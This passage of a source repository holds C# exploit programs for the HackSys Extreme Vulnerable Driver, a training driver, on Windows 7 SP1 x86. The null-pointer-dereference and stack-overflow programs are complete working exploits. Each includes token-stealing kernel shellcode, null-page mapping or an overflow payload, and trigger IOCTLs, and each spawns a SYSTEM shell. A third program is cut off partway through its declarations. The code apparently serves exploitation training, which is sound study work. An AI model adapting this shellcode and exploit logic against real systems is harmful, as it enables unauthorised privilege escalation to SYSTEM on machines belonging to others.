            CloseHandle(pi.hProcess);
            CloseHandle(pi.hThread);
        }
        else
        {
            Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
        }

        return status;
    }

    /// <summary>
    /// Entry point for the HEVD null-pointer-dereference training case on Windows 7 SP1 x86:
    /// stage the token-stealing shellcode (Step 1), map the null page and place the shellcode
    /// address in it (Step 2), open the device (Step 3), send the trigger IOCTL (Step 4) and
    /// verify the outcome by checking the process identity and spawning a shell (Step 5).
    /// Failure paths print the error code and return; CleanUp releases the device handle once
    /// it has been opened.
    /// </summary>
    static void Main()
    {
        // Token-stealing payload for Windows 7 SP1 x86. The KTHREAD/EPROCESS/TOKEN/FLINK/PID
        // offsets encoded below are specific to that build, which is why the IsWin7x86 gate
        // is mandatory. The bytes are copied verbatim into the RWX buffer in Step 1.
        byte[] shellcode = {
            //--[Setup]
            0x60, // pushad
            0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
            0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
            0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
            0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
            //--[Copy System PID token]
            0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
            0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
            0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
            0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
            0x75, 0xED, // jnz ->|
            0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
            0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
            //--[Recover]
            0x61, // popad
            0xC3 // ret
        };

        Console.WriteLine("--[ HEVD Exploitation : Null Pointer Dereference\n");

        // Refuse to continue on anything other than the build the offsets were taken from.
        if (!IsWin7x86())
        {
            return;
        }

        // Step 1: Allocate Token Stealing Shellcode
        IntPtr ShellcodeBuffer;
        uint dwSize = 0x1000; // one page; also reused as the request size in Step 2
        uint MEM_COMMIT = 0x00001000;
        uint MEM_RESERVE = 0x00002000;
        uint PAGE_EXECUTE_READWRITE = 0x40;

        Console.WriteLine("[>] Trying to allocate shellcode");
        // Writable and executable user-mode page. Mitigation note: kernel-mode execution of a
        // user-mode page is what SMEP (Windows 8+ on supporting CPUs) blocks — one of the
        // reasons this sample is Win7-only. The buffer is never freed; the process exits soon after.
        ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        if (ShellcodeBuffer == IntPtr.Zero)
        {
            Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
            return;
        }

        Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
        Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
        Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));

        // Step 2: Set shellcode pointer in null page.
        // Requesting base address 1 lets the allocation round down to page 0. Windows 8 and
        // later refuse null-page allocations for user-mode processes, so this step is
        // Win7-specific as well.
        IntPtr NullPagePointer = new IntPtr(1);
        // The Process object is never disposed; acceptable for a short-lived tool.
        IntPtr hProcess = (Process.GetCurrentProcess()).Handle;
        uint PAGE_READWRITE = 0x04;
        // 4-byte address of the shellcode buffer (ToInt32 would throw in a 64-bit process;
        // the IsWin7x86 gate keeps this x86).
        byte[] pointer = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
        uint ntstatus;
        uint NT_SUCCESS = 0; // only STATUS_SUCCESS counts; any other status is treated as failure

        Console.WriteLine("[>] Trying to allocate null page and set shellcode pointer");
        // dwSize is passed by reference and may come back rounded to the page size.
        ntstatus = NtAllocateVirtualMemory(
            hProcess, ref NullPagePointer, 0, ref dwSize,
            MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

        if (ntstatus != NT_SUCCESS)
        {
            Console.WriteLine("[-] Failed to allocate null page (code={0})", ntstatus.ToString("X8"));
            // hDevice is still IntPtr.Zero here, so CleanUp only prints its message.
            CleanUp();
            return;
        }

        // Store the shellcode address at address 4 inside the freshly mapped page.
        Marshal.Copy(pointer, 0, new IntPtr(4), 4);
        Console.WriteLine("[+] Null page allocation and shellcode pointer setting are successful");

        // Step 3: Open driver's handle
        string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
        uint GENERIC_READ = 0x80000000;
        uint GENERIC_WRITE = 0x40000000;
        uint FILE_SHARE_READ = 0x00000001;
        uint FILE_SHARE_WRITE = 0x00000002;
        uint OPEN_EXISTING = 0x3;
        uint FILE_ATTRIBUTE_NORMAL = 0x80;
        // Misspelling of FILE_FLAG_OVERLAPPED (0x40000000); the value itself is correct.
        uint FILE_FLAG_OVERWRAPPED = 0x40000000;
        IntPtr invalid = new IntPtr(-1); // INVALID_HANDLE_VALUE

        Console.WriteLine("[>] Opening {0}", deviceName);
        hDevice = CreateFile(
            deviceName, GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
            OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);

        if (hDevice == invalid)
        {
            Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
            // Returns without CleanUp: hDevice holds INVALID_HANDLE_VALUE, not a real handle,
            // so there is nothing to close.
            return;
        }

        Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));

        // Step 4: Trigger null pointer dereference
        uint ioctl = 0x22202B;
        byte[] payload = BitConverter.GetBytes((uint)0xdeadbeef); // 4-byte input buffer
        int BytesReturned = 0;

        Console.WriteLine("[>] Triggering null pointer dereference");
        // NOTE(review): the handle was opened with 0x40000000 (FILE_FLAG_OVERLAPPED) yet
        // lpOverlapped is NULL, which the DeviceIoControl contract does not allow — confirm
        // this is intended (opening the handle without the flag would be the conventional fix).
        // No output buffer is requested; the effect is only observable through IsSystem() in Step 5.
        bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);

        if (!status)
        {
            Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
            CleanUp();
            return;
        }
        // The device handle is no longer needed once the IOCTL has returned.
        CleanUp();

        // Step 5: Spawn SYSTEM shell
        // IsSystem() is the actual success check; SpawnShell only runs when it passes.
        if (IsSystem() && SpawnShell())
        {
            Console.WriteLine("[+] Exploit is completed successfully");
        }
        else
        {
            Console.WriteLine("[-] Failed to exploit");
        }
    }
}
322 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/NullPointerDereference/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly-level metadata for the NullPointerDereference executable. Only the title,
// product, copyright and version attributes carry values; the remaining descriptive
// attributes are empty strings. The typelib GUID matches the ProjectGuid in
// NullPointerDereference.csproj.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("NullPointerDereference")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("NullPointerDereference")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("f94165c3-2308-46de-9d72-dc71c96e537a")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/PoolOverflow/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/PoolOverflow/PoolOverflow.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}
8 | Exe
9 | PoolOverflow
10 | PoolOverflow
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/PoolOverflow/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly-level metadata for the PoolOverflow executable. Only the title, product,
// copyright and version attributes carry values; the remaining descriptive attributes are
// empty strings. The typelib GUID matches the ProjectGuid in PoolOverflow.csproj.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("PoolOverflow")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("PoolOverflow")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("48da5a78-6f29-44d8-8366-e7017b2bff14")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflow/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflow/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 |
5 | namespace StackOverflow
6 | {
class Program
{
    // Native SECURITY_ATTRIBUTES. nLength is filled in with Marshal.SizeOf before the
    // struct is handed to CreateProcess (see SpawnShell).
    [StructLayout(LayoutKind.Sequential)]
    struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public IntPtr lpSecurityDescriptor;
        public int bInheritHandle;
    }

    // Native STARTUPINFO with Unicode string fields. SpawnShell passes a zero-initialised
    // instance, so every field including cb is 0 at the CreateProcess call.
    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
    struct STARTUPINFO
    {
        public int cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public int dwX;
        public int dwY;
        public int dwXSize;
        public int dwYSize;
        public int dwXCountChars;
        public int dwYCountChars;
        public int dwFillAttribute;
        public int dwFlags;
        public short wShowWindow;
        public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    // Native PROCESS_INFORMATION filled by CreateProcess; SpawnShell closes both handles.
    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }

    // ntdll export (not part of the documented Win32 surface) used for the exact build
    // check in IsWin7x86.
    [DllImport("ntdll.dll")]
    static extern void RtlGetNtVersionNumbers(
        ref int MajorVersion,
        ref int MinorVersion,
        ref int BuildNumber);

    // Allocates the RWX buffer that receives the shellcode (Main, Step 1).
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(
        IntPtr lpAddress,
        uint dwSize,
        uint flAllocationType,
        uint flProtect);

    // Opens the HEVD device object (Main, Step 3).
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    static extern IntPtr CreateFile(
        string lpFileName,
        uint dwDesiredAccess,
        uint dwShareMode,
        IntPtr lpSecurityAttributes,
        uint dwCreationDisposition,
        uint dwFlagsAndAttributes,
        IntPtr hTemplateFile);

    // Sends the trigger IOCTL (Main, Step 4). InBuffer is marshalled from a managed byte[].
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DeviceIoControl(
        IntPtr hDevice,
        uint dwIoControlCode,
        byte[] InBuffer,
        int nInBufferSize,
        IntPtr OutBuffer,
        int nOutBufferSize,
        ref int pBytesReturned,
        IntPtr lpOverlapped);

    // Starts cmd.exe once the identity check in Step 5 has passed (SpawnShell).
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    static extern bool CreateProcess(
        string lpApplicationName,
        string lpCommandLine,
        ref SECURITY_ATTRIBUTES lpProcessAttributes,
        ref SECURITY_ATTRIBUTES lpThreadAttributes,
        bool bInheritHandles,
        uint dwCreationFlags,
        IntPtr lpEnvironment,
        string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo,
        out PROCESS_INFORMATION lpProcessInformation);

    // Handle release for the device handle (CleanUp) and the process/thread handles (SpawnShell).
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    // Short bounded wait on the spawned process (SpawnShell); the return value is ignored there.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);

    // Global variable
    // Handle to the HEVD device: IntPtr.Zero when not held, assigned in Main (Step 3) and
    // released by CleanUp. A failed CreateFile stores INVALID_HANDLE_VALUE (-1) here, which
    // CleanUp would pass straight to CloseHandle; Main returns without CleanUp in that path,
    // so the case is not reached today.
    static IntPtr hDevice = IntPtr.Zero;

    // Helper functions

    /// <summary>
    /// Closes the HEVD device handle if one is held and resets <see cref="hDevice"/> to
    /// IntPtr.Zero on success. A CloseHandle failure is only logged with the Win32 error
    /// code; the handle value is kept so the failure stays visible.
    /// </summary>
    static void CleanUp()
    {
        Console.WriteLine("[>] Cleaning up handle object(s)");
        if (hDevice != IntPtr.Zero)
        {
            if (CloseHandle(hDevice))
            {
                hDevice = IntPtr.Zero;
            }
            else
            {
                Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
            }
        }
    }

    /// <summary>
    /// Returns true only on Windows 7 SP1 (6.1.7601) in an x86 process; the shellcode offsets
    /// and the fixed payload layout used by Main are specific to that build. Prints which
    /// outcome was reached.
    /// </summary>
    /// <returns>true when the exact version and architecture match, false otherwise.</returns>
    static bool IsWin7x86()
    {
        // NOTE(review): PROCESSOR_ARCHITECTURE reflects the process, not the OS — a 32-bit
        // process under WOW64 also reports x86 — so this check alone does not prove a 32-bit
        // kernel. Confirm whether that matters for the callers.
        string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
        int MajorVersion = 0;
        int MinorVersion = 0;
        int BuildNumber = 0;
        RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
        // The build number comes back with flag bits in its upper half; keep the 16-bit build.
        BuildNumber &= 0xFFFF;

        if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
            string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
        {
            Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
            return true;
        }
        else
        {
            Console.WriteLine("[-] Unsupported OS is detected");
            return false;
        }
    }

    /// <summary>
    /// Reports whether the current process identity is the SYSTEM account. Main calls this
    /// after the IOCTL has returned, so it is the success test for the token swap.
    /// </summary>
    /// <returns>true when Environment.UserName equals "SYSTEM" (case-insensitive).</returns>
    static bool IsSystem()
    {
        string user = Environment.UserName;

        if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
        {
            return true;
        }
        else
        {
            return false;
        }
    }

    /// <summary>
    /// Starts C:\Windows\System32\cmd.exe in a new console with System32 as its working
    /// directory, waits up to 500 ms on the process handle, then closes both returned handles.
    /// The child inherits whatever token this process holds at the time of the call.
    /// </summary>
    /// <returns>The CreateProcess result; the Win32 error code is printed on failure.</returns>
    static bool SpawnShell()
    {
        string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
        SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
        SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
        uint CREATE_NEW_CONSOLE = 0x00000010;
        string CurrentDirectory = "C:\\Windows\\System32";
        // NOTE(review): si.cb stays 0; the Win32 contract expects sizeof(STARTUPINFO) — confirm
        // this is intended.
        STARTUPINFO si = new STARTUPINFO();
        pSec.nLength = Marshal.SizeOf(pSec);
        tSec.nLength = Marshal.SizeOf(tSec);

        // No command line, no handle inheritance, inherited environment.
        bool status = CreateProcess(
            ApplicationName, null, ref pSec, ref tSec, false,
            CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
            ref si, out PROCESS_INFORMATION pi);

        if (status)
        {
            Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
            // Brief wait only; closing the handles does not end the shell.
            WaitForSingleObject(pi.hProcess, 500);
            CloseHandle(pi.hProcess);
            CloseHandle(pi.hThread);
        }
        else
        {
            Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
        }

        return status;
    }

    /// <summary>
    /// Entry point for the HEVD stack-overflow training case on Windows 7 SP1 x86: stage the
    /// token-stealing shellcode (Step 1), build the oversized input buffer (Step 2), open the
    /// device (Step 3), send the trigger IOCTL (Step 4) and verify the outcome by checking the
    /// process identity and spawning a shell (Step 5). Failure paths print the error code and
    /// return; CleanUp releases the device handle once it has been opened.
    /// </summary>
    static void Main()
    {
        // Token-stealing payload for Windows 7 SP1 x86. The KTHREAD/EPROCESS/TOKEN/FLINK/PID
        // offsets encoded below are specific to that build, which is why the IsWin7x86 gate
        // is mandatory. The bytes are copied verbatim into the RWX buffer in Step 1. Unlike
        // the null-pointer sample (plain ret), this variant ends with pop ebp / ret 8.
        byte[] shellcode = {
            //--[Setup]
            0x60, // pushad
            0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
            0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
            0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
            0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
            //--[Copy System PID token]
            0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
            0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
            0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
            0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
            0x75, 0xED, // jnz ->|
            0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
            0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
            //--[Recover]
            0x61, // popad
            0x5D, // pop ebp
            0xC2, 0x08, 0x00 // ret 8
        };

        Console.WriteLine("--[ HEVD Exploitation : Stack Overflow\n");

        // Refuse to continue on anything other than the build the offsets were taken from.
        if (!IsWin7x86())
        {
            return;
        }

        // Step 1: Allocate Token Stealing Shellcode
        IntPtr ShellcodeBuffer;
        uint dwSize = 0x1000; // one page
        uint MEM_COMMIT = 0x00001000;
        uint MEM_RESERVE = 0x00002000;
        uint PAGE_EXECUTE_READWRITE = 0x40;

        Console.WriteLine("[>] Trying to allocate shellcode");
        // Writable and executable user-mode page. Mitigation note: kernel-mode execution of a
        // user-mode page is what SMEP (Windows 8+ on supporting CPUs) blocks — one of the
        // reasons this sample is Win7-only. The buffer is never freed; the process exits soon after.
        ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        if (ShellcodeBuffer == IntPtr.Zero)
        {
            Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
            return;
        }

        Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
        Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
        Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));

        // Step 2: Prepare payload for overwriting kernel pointer
        // 0x820 filler bytes followed by the 4-byte shellcode address; the whole buffer is
        // handed to DeviceIoControl in Step 4. Mitigation note: an overwrite of this kind is
        // what /GS stack cookies are designed to catch (the StackOverflowGS project is the
        // cookie-protected variant). ToInt32 would throw in a 64-bit process; the IsWin7x86
        // gate keeps this x86.
        byte[] offset = Encoding.ASCII.GetBytes(new string('A', 0x820));
        byte[] pointer = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
        byte[] payload = new byte[offset.Length + pointer.Length];
        offset.CopyTo(payload, 0);
        pointer.CopyTo(payload, offset.Length);

        // Step 3: Open driver's handle
        string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
        uint GENERIC_READ = 0x80000000;
        uint GENERIC_WRITE = 0x40000000;
        uint FILE_SHARE_READ = 0x00000001;
        uint FILE_SHARE_WRITE = 0x00000002;
        uint OPEN_EXISTING = 0x3;
        uint FILE_ATTRIBUTE_NORMAL = 0x80;
        // Misspelling of FILE_FLAG_OVERLAPPED (0x40000000); the value itself is correct.
        uint FILE_FLAG_OVERWRAPPED = 0x40000000;
        IntPtr invalid = new IntPtr(-1); // INVALID_HANDLE_VALUE

        Console.WriteLine("[>] Opening {0}", deviceName);
        hDevice = CreateFile(
            deviceName, GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
            OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);

        if (hDevice == invalid)
        {
            Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
            // Returns without CleanUp: hDevice holds INVALID_HANDLE_VALUE, not a real handle,
            // so there is nothing to close.
            return;
        }

        Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));

        // Step 4: Trigger stack overflow
        uint ioctl = 0x222003;
        int BytesReturned = 0;

        Console.WriteLine("[>] Triggering stack overflow");
        // NOTE(review): the handle was opened with 0x40000000 (FILE_FLAG_OVERLAPPED) yet
        // lpOverlapped is NULL, which the DeviceIoControl contract does not allow — confirm
        // this is intended (opening the handle without the flag would be the conventional fix).
        // No output buffer is requested; the effect is only observable through IsSystem() in Step 5.
        bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);

        if (!status)
        {
            Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
            CleanUp();
            return;
        }
        // The device handle is no longer needed once the IOCTL has returned.
        CleanUp();

        // Step 5: Spawn SYSTEM shell
        // IsSystem() is the actual success check; SpawnShell only runs when it passes.
        if (IsSystem() && SpawnShell())
        {
            Console.WriteLine("[+] Exploit is completed successfully");
        }
        else
        {
            Console.WriteLine("[-] Failed to exploit");
        }
    }
}
297 | }
298 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflow/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly-level metadata for the StackOverflow executable. Only the title, product,
// copyright and version attributes carry values; the remaining descriptive attributes are
// empty strings. The typelib GUID matches the ProjectGuid in StackOverflow.csproj.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("StackOverflow")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("StackOverflow")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("f11dcd73-3213-4687-add0-198d6bfc225f")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflow/StackOverflow.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}
8 | Exe
9 | StackOverflow
10 | StackOverflow
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 | true
25 |
26 |
27 | ..\bin\x86\Release\
28 | TRACE
29 | true
30 | pdbonly
31 | x86
32 | prompt
33 | MinimumRecommendedRules.ruleset
34 | true
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflowGS/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflowGS/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 |
5 | namespace StackOverflowGS
6 | {
7 | class Program
8 | {
// Native SECURITY_ATTRIBUTES passed (by ref) to CreateProcess; same layout as in the
// sibling HEVD_Win7x86 samples. nLength is expected to hold the marshalled size.
[StructLayout(LayoutKind.Sequential)]
struct SECURITY_ATTRIBUTES
{
    public int nLength;
    public IntPtr lpSecurityDescriptor;
    public int bInheritHandle;
}
16 |
// Native STARTUPINFO with Unicode string fields, passed (by ref) to CreateProcess.
// cb is the documented size field; whether this file sets it is outside the visible part.
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
struct STARTUPINFO
{
    public int cb;
    public string lpReserved;
    public string lpDesktop;
    public string lpTitle;
    public int dwX;
    public int dwY;
    public int dwXSize;
    public int dwYSize;
    public int dwXCountChars;
    public int dwYCountChars;
    public int dwFillAttribute;
    public int dwFlags;
    public short wShowWindow;
    public short cbReserved2;
    public IntPtr lpReserved2;
    public IntPtr hStdInput;
    public IntPtr hStdOutput;
    public IntPtr hStdError;
}
39 |
// Native PROCESS_INFORMATION returned (out) by CreateProcess. Both handles must be closed
// with CloseHandle by the caller.
[StructLayout(LayoutKind.Sequential)]
struct PROCESS_INFORMATION
{
    public IntPtr hProcess;
    public IntPtr hThread;
    public int dwProcessId;
    public int dwThreadId;
}
48 |
// ntdll export (not part of the documented Win32 surface) that reports the OS major/minor
// version and build number; the build value carries flag bits in its upper half.
[DllImport("ntdll.dll")]
static extern void RtlGetNtVersionNumbers(
    ref int MajorVersion,
    ref int MinorVersion,
    ref int BuildNumber);
54 |
// Reserves/commits a region in this process; returns IntPtr.Zero on failure
// (SetLastError = true makes Marshal.GetLastWin32Error valid afterwards).
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAlloc(
    IntPtr lpAddress,
    uint dwSize,
    uint flAllocationType,
    uint flProtect);
61 |
// Releases a region obtained with VirtualAlloc. This import is specific to this project
// (the StackOverflow and NullPointerDereference samples never free their buffer); its call
// site is outside the visible part of the file.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool VirtualFree(
    IntPtr lpAddress,
    uint dwSize,
    uint dwFreeType);
67 |
// Opens a file or device object by name; returns INVALID_HANDLE_VALUE (-1) on failure.
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
static extern IntPtr CreateFile(
    string lpFileName,
    uint dwDesiredAccess,
    uint dwShareMode,
    IntPtr lpSecurityAttributes,
    uint dwCreationDisposition,
    uint dwFlagsAndAttributes,
    IntPtr hTemplateFile);
77 |
78 | [DllImport("kernel32.dll", SetLastError = true)]
